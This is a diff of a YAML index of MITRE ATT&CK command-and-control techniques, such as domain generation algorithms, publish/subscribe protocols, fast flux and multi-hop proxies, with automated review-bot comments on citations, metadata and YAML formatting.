- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
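Review bot: the Akamai DGA Mitigation reference changes its URL from blogs.akamai.com to a personal Medium post (medium.com/@yvyuz/...) while the description still says "Retrieved February 18, 2019"; a retrieval date should track the URL actually retrieved, as was done for the NetSPI entries elsewhere in this diff. Also note that x_mitre_permissions_required (User) is dropped and x_mitre_version moves from '1.0' to '1.1' with no change to the description or detection text; if that is upstream data it is fine, but worth stating in the commit message.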
@@ -37886,9 +38309,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
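Review bot: the description of the new T1071.005 is rendered across lines that lack the `+` prefix and begin with `, XMPP`, `,` and `, and STOMP` (after `MQTT` and `AMQP`), which looks like inline markup around the protocol names was stripped when the double-quoted YAML scalar was emitted; load the file with a YAML parser and check that the description reads `Protocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design` with no stray line breaks. Also `x_mitre_detection: ''` is empty even though two Network Traffic data sources are listed; a one-line detection hint (for example, monitoring for MQTT, AMQP, STOMP or XMPP sessions to brokers that are not known to the environment) would make this entry consistent with the other techniques in the file.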
@@ -37934,7 +38415,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -37966,7 +38446,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37988,22 +38468,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
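Review bot: the T1568.001 tail of this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` without showing a replacement, whereas the other techniques in this diff keep `x_mitre_attack_spec_version: 3.2.0` as retained context. Verify the regenerated T1568.001 object still carries the attribute at another position, or note that techniques not updated upstream since spec 2.1 lose it. The T1071 description change in the same hunk (adding "DNS, or publishing/subscribing") is consistent with the new T1071.005 sub-technique imported at the top of this diff.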
@@ -38025,7 +38503,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -38050,7 +38528,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -38134,7 +38611,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -38198,11 +38674,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -38286,7 +38761,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -38317,7 +38791,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -38337,8 +38811,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
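Review bot: the link text in the T1572 description changes from "Protocol Impersonation" to "Protocol or Service Impersonation" while the URL stays `https://attack.mitre.org/techniques/T1001/003`, which matches the rename of T1001.003 later in this diff, so the cross-reference remains valid. No action needed beyond confirming both hunks ship together.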
@@ -38360,8 +38834,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -38423,7 +38895,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -38471,7 +38942,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -38525,7 +38995,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -38558,7 +39027,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -38578,8 +39047,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -38617,7 +39084,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -38645,42 +39112,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
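Review bot: most of this hunk is key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted at the top of T1102 and reappear lower down, which hides the two real changes (the description now cites Microsoft and `(Citation: Broadcom BirdyClient Microsoft Graph API 2024)`, and a second contributor plus `x_mitre_deprecated: false` are added). If the generator serializes the STIX object in its native key order, pin a stable order (or sort keys) so future diffs show only value changes.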
@@ -38689,17 +39136,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
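Review bot: `x_mitre_permissions_required:` / `- User` is removed from T1102 with no replacement, alongside the addition of `revoked: false`; that field has been retired upstream, but anything in this repository that filters or groups techniques by `x_mitre_permissions_required` should be checked before merge. The new `Broadcom BirdyClient Microsoft Graph API 2024` reference matches the citation added to the description in the previous hunk, so the citation list and reference list stay consistent.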
@@ -38731,7 +39200,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -38748,8 +39217,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -38769,7 +39236,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38792,8 +39259,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -38818,7 +39283,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38843,8 +39308,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -38909,7 +39372,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -38933,7 +39395,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38958,21 +39420,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
